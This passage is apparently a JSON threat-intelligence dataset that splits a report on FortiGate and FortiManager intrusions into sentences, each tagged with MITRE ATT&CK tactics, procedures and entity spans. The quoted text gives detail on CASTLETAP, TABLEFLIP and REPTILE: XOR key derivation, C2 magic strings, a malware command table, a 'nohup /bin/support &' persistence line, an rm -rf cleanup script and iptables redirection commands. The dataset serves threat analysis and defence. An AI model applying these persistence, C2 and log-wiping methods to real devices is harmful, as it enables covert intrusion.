83, "context_before": "hpaVAj2FJ", "sentence_text": "Kills CASTLETAP process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p9-s84-e34e6a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 84, "context_before": "Kills CASTLETAP process.", "sentence_text": "To decode the C2 information within the ICMP packet, a single-byte XOR key was derived from the Epoch date stamp to decrypt the payload data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p9-s85-53b329", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 85, "context_before": "To decode the C2 information within the ICMP packet, a single-byte XOR key was derived from the Epoch date stamp to decrypt the payload data.", "sentence_text": "This meant the encoding standard changed every day.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p9-s86-c976ff", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 86, "context_before": "This meant the encoding standard changed every day.", "sentence_text": "((year + 1900 + month * (year + 1900))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p9-s87-4e59fd", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 87, "context_before": "((year + 1900 + month * (year + 1900))", "sentence_text": "* date) % 255 year: index starting from 1900 i.e. current_year-1900 month: index starting from 0 date: index starting from 1 Byte Index/Range Payload Section Description <0x00-0x01> <0x01-0x02> <0x02-0x0c> <9-byte magic string + null byte> <0x0c-0x10> <0x10-0x15> ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p9-s88-70de35", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 88, "context_before": "* date) % 255 year: index starting from 1900 i.e. current_year-1900 month: index starting from 0 date: index starting from 1 Byte Index/Range Payload Section Description <0x00-0x01> <0x01-0x02> <0x02-0x0c> <9-byte magic string + null byte> <0x0c-0x10> <0x10-0x15> ", "sentence_text": "When the C2 IP address and port was parsed from the activation packet, CASTLETAP initiated a connection to the C2 over an SSL socket.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Initiate a connection to the C2 server over an SSL socket.", "entities": [ { "text": "CASTLETAP", "start": 71, "end": 80, "label": "MalwareTool" }, { "text": "initiated a connection to the C2 over an SSL socket", "start": 81, "end": 132, "label": "Action" }, { "text": "C2", "start": 111, "end": 113, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p9-s89-dadcb3", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 89, "context_before": "When the C2 IP address and port was parsed from the activation packet, CASTLETAP initiated a connection to the C2 over an SSL socket.", "sentence_text": "Once this connection was established, CASTLETAP expected the C2 server to initiate a handshake with the 16-byte sequence seen in Figure 13, echoing the same sequence in response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p9-s90-6f98e5", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 90, "context_before": "Once this connection was established, CASTLETAP expected the C2 server to initiate a handshake with the 16-byte sequence seen in Figure 13, echoing the same sequence in response.", "sentence_text": "Once connected to the C2, CASTLETAP could accept multiple types of commands over SSL, as seen in Table 4.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p9-s91-ecf63b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 9, "sentence_id": 91, "context_before": "Once connected to the C2, CASTLETAP could accept multiple types of commands over SSL, as seen in Table 4.", "sentence_text": "Command Description\n0x1 Upload file (to victim)\n9/21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s92-c23254", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 92, "context_before": "Command Description\n0x1 Upload file (to victim)\n9/21", "sentence_text": "0x2 Download file (from victim)\n0x3", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s93-612c83", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 93, "context_before": "0x2 Download file (from victim)\n0x3", "sentence_text": "Spawn busybox based command shell, otherwise fallback to a normal command shell.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s95-8fbf34", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 95, "context_before": "0x4", "sentence_text": "Continue receiving 0x5", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s96-4bd88e", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 96, "context_before": "Continue receiving 0x5", "sentence_text": "Receive complete When a command was successfully received, the backdoor returned the sequence ‘;7(Zu9YTsA7qQ#vw’ as an acknowledgement token; this same string was also sent to signal session termination.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Backdoor receives commands and returns a fixed acknowledgement token, also using it to signal session termination.", "entities": [ { "text": "the backdoor", "start": 59, "end": 71, "label": "MalwareTool" }, { "text": "command was successfully received", "start": 24, "end": 57, "label": "Action" }, { "text": "returned the sequence ‘;7(Zu9YTsA7qQ#vw’ as an acknowledgement token", "start": 72, "end": 140, "label": "Action" }, { "text": "sent to signal session termination", "start": 168, "end": 202, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p10-s97-eed8b3", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 97, "context_before": "Receive complete When a command was successfully received, the backdoor returned the sequence ‘;7(Zu9YTsA7qQ#vw’ as an acknowledgement token; this same string was also sent to signal session termination.", "sentence_text": "Once CASTLETAP was deployed to the FortiGate firewalls, the threat actor connected to ESXi and vCenter machines.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Connect from compromised FortiGate devices to ESXi and vCenter systems.", "entities": [ { "text": "connected to ESXi and vCenter machines", "start": 73, "end": 111, "label": "Action" }, { "text": "ESXi and vCenter machines", "start": 86, "end": 111, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p10-s98-55616b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 98, "context_before": "Once CASTLETAP was deployed to the FortiGate firewalls, the threat actor connected to ESXi and vCenter machines.", "sentence_text": "The threat actor deployed VIRTUALPITA and VIRTUALPIE to establish persistence, allowing for continued access to the hypervisors and the guest machines.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Deploy VIRTUALPITA and VIRTUALPIE to establish persistence on target systems.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "VIRTUALPITA", "start": 26, "end": 37, "label": "MalwareTool" }, { "text": "VIRTUALPIE", "start": 42, "end": 52, "label": "MalwareTool" }, { "text": "deployed VIRTUALPITA and VIRTUALPIE", "start": 17, "end": 52, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p10-s99-ae26f3", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 99, "context_before": "The threat actor deployed VIRTUALPITA and VIRTUALPIE to establish persistence, allowing for continued access to the hypervisors and the guest machines.", "sentence_text": "This is described in further detail in the blog post, “Bad VIB(E)s", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s100-4c8da9", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 100, "context_before": "This is described in further detail in the blog post, “Bad VIB(E)s", "sentence_text": "Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s101-362da8", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 101, "context_before": "Part One: Investigating Novel Malware Persistence Within ESXi Hypervisors.”", "sentence_text": "Scenario #2 (Detailed): FortiManager Not Exposed to the Internet The technical details that follow describe the attack path taken by the threat actor where the FortiManager had network Access Control Lists (ACL) set up to restrict external access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s102-e74307", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 102, "context_before": "Scenario #2 (Detailed): FortiManager Not Exposed to the Internet The technical details that follow describe the attack path taken by the threat actor where the FortiManager had network Access Control Lists (ACL) set up to restrict external access.", "sentence_text": "Regaining Access to the Internet-restricted FortiManager When ACLs were implemented on the FortiManager device, the threat actor lost direct public access to device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s103-23cc16", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 103, "context_before": "Regaining Access to the Internet-restricted FortiManager When ACLs were implemented on the FortiManager device, the threat actor lost direct public access to device.", "sentence_text": "To regain access to the FortiManager, the threat actor pivoted from a FortiGate Firewall compromised with CASTLETAP.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Pivot from a compromised FortiGate firewall to regain access to FortiManager.", "entities": [ { "text": "the threat actor", "start": 38, "end": 54, "label": "ThreatActor" }, { "text": "CASTLETAP", "start": 106, "end": 115, "label": "MalwareTool" }, { "text": "pivoted from a FortiGate Firewall compromised with CASTLETAP", "start": 55, "end": 115, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p10-s104-243503", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 104, "context_before": "To regain access to the FortiManager, the threat actor pivoted from a FortiGate Firewall compromised with CASTLETAP.", "sentence_text": "The threat actor then deployed the following three (3) malicious files, seen in Table 5, to the FortiManager upon successful reconnection.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Deploy three malicious files to the FortiManager.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "deployed the following three (3) malicious files", "start": 22, "end": 70, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p10-s105-1ebbf2", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 105, "context_before": "The threat actor then deployed the following three (3) malicious files, seen in Table 5, to the FortiManager upon successful reconnection.", "sentence_text": "Malware File Path Description Family N/A /bin/support Launches /bin/auth and /bin/klogd and deletes the two files along with /bin/support from disk.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s106-35eb9b", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 106, "context_before": "Malware File Path Description Family N/A /bin/support Launches /bin/auth and /bin/klogd and deletes the two files along with /bin/support from disk.", "sentence_text": "TABLEFLIP /bin/auth", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s107-e90e92", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 107, "context_before": "TABLEFLIP /bin/auth", "sentence_text": "A passive utility to setup network traffic redirection from a specific IP address destined to the FortiManager on TCP port 541 to another specified port.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s108-4a7bcd", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 108, "context_before": "A passive utility to setup network traffic redirection from a specific IP address destined to the FortiManager on TCP port 541 to another specified port.", "sentence_text": "REPTILE /bin/klogd", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s109-c01f17", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 109, "context_before": "REPTILE /bin/klogd", "sentence_text": "A backdoor utility that listens for a specialized packet for activation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s110-fabeed", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 110, "context_before": "A backdoor utility that listens for a specialized packet for activation.", "sentence_text": "The file /bin/support (MD5: 9ce2459168cf4b5af494776a70e0feda ) served as a launch script to execute /bin/klogd (REPTILE variant) and /bin/auth (TABLEFLIP).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "A script executes malicious binaries on the system.", "entities": [ { "text": "execute /bin/klogd", "start": 92, "end": 110, "label": "Action" }, { "text": "and /bin/auth", "start": 129, "end": 142, "label": "Action" }, { "text": "/bin/klogd", "start": 100, "end": 110, "label": "Infrastructure_Indicator" }, { "text": "/bin/auth", "start": 133, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p10-s111-1314b8", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 111, "context_before": "The file /bin/support (MD5: 9ce2459168cf4b5af494776a70e0feda ) served as a launch script to execute /bin/klogd (REPTILE variant) and /bin/auth (TABLEFLIP).", "sentence_text": "The attacker modified the startup file /etc/init.d/localnet to execute the line ‘ nohup /bin/support & ’ so the script would run every time the system was rebooted.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Modify startup file /etc/init.d/localnet to execute nohup /bin/support for persistence on system reboot.", "entities": [ { "text": "The attacker", "start": 0, "end": 12, "label": "ThreatActor" }, { "text": "modified the startup file /etc/init.d/localnet to execute the line ‘ nohup /bin/support & ’", "start": 13, "end": 104, "label": "Action" }, { "text": "/etc/init.d/localnet", "start": 39, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "nohup /bin/support &", "start": 82, "end": 102, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p10-s112-fddfe7", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 112, "context_before": "The attacker modified the startup file /etc/init.d/localnet to execute the line ‘ nohup /bin/support & ’ so the script would run every time the system was rebooted.", "sentence_text": "Since the running FortiOS file system was an ephemeral copy of the archive rootfs.gz , the files would be deleted from the ephemeral copy after being loaded into memory and persist in the rootfs.gz archive, a file not accessible to users without pulling a forensic image.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p10-s113-a57036", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 10, "sentence_id": 113, "context_before": "Since the running FortiOS file system was an ephemeral copy of the archive rootfs.gz , the files would be deleted from the ephemeral copy after being loaded into memory and persist in the rootfs.gz archive, a file not accessible to users without pulling a forensic image.", "sentence_text": "The contents of /bin/support can be seen in Figure 14.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p11-s115-eef11d", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 11, "sentence_id": 115, "context_before": "10/21", "sentence_text": "#!/bin/bash\n#cp /bin/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p11-s116-a22fbb", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 11, "sentence_id": 116, "context_before": "#!/bin/bash\n#cp /bin/", "sentence_text": "sh /bin/top sleep 30 /bin/klogd /bin/auth rm -rf /bin/klogd", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p11-s117-d397d8", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 11, "sentence_id": 117, "context_before": "sh /bin/top sleep 30 /bin/klogd /bin/auth rm -rf /bin/klogd", "sentence_text": "rm -rf /nohup.out rm -rf /bin", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p11-s118-2644cd", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 11, "sentence_id": 118, "context_before": "rm -rf /nohup.out rm -rf /bin", "sentence_text": "/support /bin/support TABLEFLIP (Traffic Redirection Utility)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p11-s119-e10b29", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 11, "sentence_id": 119, "context_before": "/support /bin/support TABLEFLIP (Traffic Redirection Utility)", "sentence_text": "To enable continued access directly from the Internet, the threat actor implemented TABLEFLIP (MD5:\nb6e92149efaf78e9ce7552297505b9d5 ), a passive traffic redirection utility that listens on all active interfaces for specialized command packets.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Implement TABLEFLIP to enable continued remote access via traffic redirection.", "entities": [ { "text": "the threat actor", "start": 55, "end": 71, "label": "ThreatActor" }, { "text": "TABLEFLIP", "start": 84, "end": 93, "label": "MalwareTool" }, { "text": "implemented TABLEFLIP", "start": 72, "end": 93, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p12-s120-e9aff0", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 12, "sentence_id": 120, "context_before": "To enable continued access directly from the Internet, the threat actor implemented TABLEFLIP (MD5:\nb6e92149efaf78e9ce7552297505b9d5 ), a passive traffic redirection utility that listens on all active interfaces for specialized command packets.", "sentence_text": "This key was used as a seed for XOR based sequential decryption.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p12-s121-92a995", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 12, "sentence_id": 121, "context_before": "This key was used as a seed for XOR based sequential decryption.", "sentence_text": "TCP payload offset 0xC onwards was decrypted using this scheme.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p13-s122-93e346", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 122, "context_before": "TCP payload offset 0xC onwards was decrypted using this scheme.", "sentence_text": "Command Description\n0xFFFEFDFC Enable redirection for traffic with source IP matching extracted IP and port 541 to extracted destination port 0xFCFDFEFF", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p13-s123-fec003", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 123, "context_before": "Command Description\n0xFFFEFDFC Enable redirection for traffic with source IP matching extracted IP and port 541 to extracted destination port 0xFCFDFEFF", "sentence_text": "Disable redirection for traffic with source IP matching extracted IP and specified destination port Traffic redirection was accomplished by adding iptables rules on the FortiManager system as seen in Figure 18.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Add iptables rules on the FortiManager system to redirect traffic.", "entities": [ { "text": "adding iptables rules on the FortiManager system", "start": 140, "end": 188, "label": "Action" }, { "text": "iptables rules", "start": 147, "end": 161, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p13-s124-6f9fe7", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 124, "context_before": "Disable redirection for traffic with source IP matching extracted IP and specified destination port Traffic redirection was accomplished by adding iptables rules on the FortiManager system as seen in Figure 18.", "sentence_text": "with the source IP and redirection port specified in the command packet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p13-s125-258197", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 125, "context_before": "with the source IP and redirection port specified in the command packet.", "sentence_text": "iptables was executed to check if a PREROUTING rule for that IP and port combination already existed.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "The attacker executes iptables to check existing network redirection rules.", "entities": [ { "text": "iptables was executed", "start": 0, "end": 21, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p13-s126-c10cf9", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 126, "context_before": "iptables was executed to check if a PREROUTING rule for that IP and port combination already existed.", "sentence_text": "If the combination was not found, a new redirection rule was added in the PREROUTING chain.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": null, "procedure": "The attacker adds a network redirection rule to the system.", "entities": [ { "text": "redirection rule was added", "start": 40, "end": 66, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p13-s127-c9c840", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 127, "context_before": "If the combination was not found, a new redirection rule was added in the PREROUTING chain.", "sentence_text": "The rules under the PREROUTING chain were processed immediately once the packet is received on an interface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p13-s128-623526", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 128, "context_before": "The rules under the PREROUTING chain were processed immediately once the packet is received on an interface.", "sentence_text": "These id’s were passed back to iptables with xargs to have them removed from the PREROUTING chain, as seen in Figure 19.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p13-s129-840a81", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 129, "context_before": "These id’s were passed back to iptables with xargs to have them removed from the PREROUTING chain, as seen in Figure 19.", "sentence_text": "iptables -t nat -S PREROUTING | tail", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p13-s130-5ee828", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 130, "context_before": "iptables -t nat -S PREROUTING | tail", "sentence_text": "-n +2 | grep -n -E '.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p13-s131-713a8d", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 131, "context_before": "-n +2 | grep -n -E '.", "sentence_text": "To achieve persistent access on the FortiManager device, the threat actor deployed a backdoor with the filename /bin/klogd (MD5: 53a69adac914808eced2bf8155a7512d ) that Mandiant refers to as REPTILE, a variant of a publicly available Linux kernel module (LKM) rootkit.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Deploy a backdoor /bin/klogd (REPTILE) to maintain persistent access.", "entities": [ { "text": "the threat actor", "start": 57, "end": 73, "label": "ThreatActor" }, { "text": "REPTILE", "start": 191, "end": 198, "label": "MalwareTool" }, { "text": "/bin/klogd", "start": 112, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "deployed a backdoor with the filename /bin/klogd", "start": 74, "end": 122, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p13-s132-3cbf5a", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 132, "context_before": "To achieve persistent access on the FortiManager device, the threat actor deployed a backdoor with the filename /bin/klogd (MD5: 53a69adac914808eced2bf8155a7512d ) that Mandiant refers to as REPTILE, a variant of a publicly available Linux kernel module (LKM) rootkit.", "sentence_text": "With the assistance of TABLEFLIP, the threat actor was able to successfully forward traffic and access the REPTILE backdoor using iptables traffic redirection rules.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Forward traffic and access the REPTILE backdoor via traffic redirection.", "entities": [ { "text": "the threat actor", "start": 34, "end": 50, "label": "ThreatActor" }, { "text": "TABLEFLIP", "start": 23, "end": 32, "label": "MalwareTool" }, { "text": "REPTILE", "start": 107, "end": 114, "label": "MalwareTool" }, { "text": "forward traffic", "start": 76, "end": 91, "label": "Action" }, { "text": "access the REPTILE backdoor", "start": 96, "end": 123, "label": "Action" }, { "text": "iptables traffic redirection rules", "start": 130, "end": 164, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-13_aptnotes_report-p13-s133-016588", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 133, "context_before": "With the assistance of TABLEFLIP, the threat actor was able to successfully forward traffic and access the REPTILE backdoor using iptables traffic redirection rules.", "sentence_text": "Once executed, REPTILE created a packet socket to receive OSI layer 2 packets.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1040", "name": "Network Sniffing" } ], "procedure": "Create a packet socket to receive OSI layer 2 packets.", "entities": [ { "text": "REPTILE", "start": 15, "end": 22, "label": "MalwareTool" }, { "text": "created a packet socket", "start": 23, "end": 46, "label": "Action" }, { "text": "receive OSI layer 2 packets", "start": 50, "end": 77, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p13-s134-9aa863", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 13, "sentence_id": 134, "context_before": "Once executed, REPTILE created a packet socket to receive OSI layer 2 packets.", "sentence_text": "When a packet was received, the backdoor would perform the check seen in the pseudocode in Figure 20 to determine if a magic string was present.\n13/21", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p14-s135-646f3e", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 135, "context_before": "When a packet was received, the backdoor would perform the check seen in the pseudocode in Figure 20 to determine if a magic string was present.\n13/21", "sentence_text": "single_byte_xor_key = (month * year)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p14-s136-82bf58", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 136, "context_before": "single_byte_xor_key = (month * year)", "sentence_text": "decoded_data[i] = data_to_decode_ptr[i++]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p14-s137-c84abf", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 137, "context_before": "decoded_data[i] = data_to_decode_ptr[i++]\n^ single_byte_xor_key;\nstrncmp(&decoded_data, \"mznCvqSBo\", 9)\nMagic String Description mznCvqSBo Parse C2 information from OSI layer 2 packet and connects to it over SSL.", "sentence_text": "^ single_byte_xor_key;\nstrncmp(&decoded_data, \"mznCvqSBo\", 9)\nMagic String Description mznCvqSBo Parse C2 information from OSI layer 2 packet and connects to it over SSL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-13_aptnotes_report-p14-s139-072bf6", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 139, "context_before": "hpaVAj2FJ", "sentence_text": "Kills REPTILE process (Only searched for if first magic string not found)\nSimilar to the method used by CASTLETAP to decode the C2 information, REPTILE derived a single-byte XOR key from the Epoch date stamp to decrypt payload data, which caused the encryption key to change daily.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1562", "name": "Impair Defenses" }, { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Terminate REPTILE process conditionally and derive a dynamic XOR key from the system timestamp to decrypt payload data for C2 communication.", "entities": [ { "text": "Kills REPTILE process", "start": 0, "end": 21, "label": "Action" }, { "text": "REPTILE", "start": 6, "end": 13, "label": "MalwareTool" }, { "text": "CASTLETAP", "start": 104, "end": 113, "label": "MalwareTool" }, { "text": "decode the C2 information", "start": 117, "end": 142, "label": "Action" }, { "text": "REPTILE derived a single-byte XOR key", "start": 144, "end": 181, "label": "Action" }, { "text": "decrypt payload data", "start": 211, "end": 231, "label": "Action" } ] }, { "uid": "aptnotes-13_aptnotes_report-p14-s140-b73903", "source": "aptnotes", "doc_id": "13_aptnotes_report", "page_number": 14, "sentence_id": 140, "context_before": "Kills REPTILE process (Only searched for if first magic string not found)\nSimilar to the method used by CASTLETAP to decode the C2 information, REPTILE derived a single-byte XOR key from the Epoch date stamp to decrypt payload data, which caused the encryption key to change daily.", "sentence_text": "(month * (year + 1900))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { 